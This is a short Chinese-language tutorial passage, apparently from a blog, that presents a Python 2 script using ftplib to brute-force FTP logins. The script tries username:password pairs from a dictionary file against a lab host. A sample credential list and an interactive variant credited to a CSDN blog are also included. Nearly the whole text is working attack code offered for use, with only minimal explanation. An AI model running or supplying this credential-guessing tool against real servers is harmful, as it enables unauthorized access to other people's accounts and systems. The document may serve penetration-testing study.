同样是通过ftplib模块,结合读取含有密码的文件来实现FTP用户口令的破解:
#!/usr/bin/python #coding=utf-8 import ftplib def bruteLogin(hostname,passwdFile): pF = open(passwdFile,'r') for line in pF.readlines(): username = line.split(':')[0] password = line.split(':')[1].strip('\r').strip('\n') print '[+] Trying: ' + username + '/' + password try: ftp = ftplib.FTP(hostname) ftp.login(username,password) print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password ftp.quit() return (username,password) except Exception, e: pass print '\n[-] Could not brubrute force FTP credentials.' return (None,None) host = '10.10.10.128' passwdFile = 'ftpBL.txt' bruteLogin(host,passwdFile)
其中密码字典中的ftbBL.txt文件内容:
admin:123123
wang:abcabc
root:abc123123
【修改后的代码】来自:https://blog.csdn.net/SKI_12
小改一下:
#!/usr/bin/python import ftplib def bruteLogin(hostname,passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): username=line.split(':')[0] password=line.split(':')[1].strip('\r').strip('\n') print '[+] Trying: '+username+"/"+password try: ftp=ftplib.FTP(hostname) ftp.login(username,password) print '\n[*] '+str(hostname)+' FTP Logon Succeeded: '+username+"/"+password return (username,password) except Exception,e: pass print '\n[-] Could not brute force FTP credentials.' return (None,None) def main(): while True: h=raw_input("[*] Please enter the hostname: ") f=raw_input("[*] Please enter the filename: ") bruteLogin(h,f) print if __name__ == '__main__': main()
调用方式:brtelogin2.py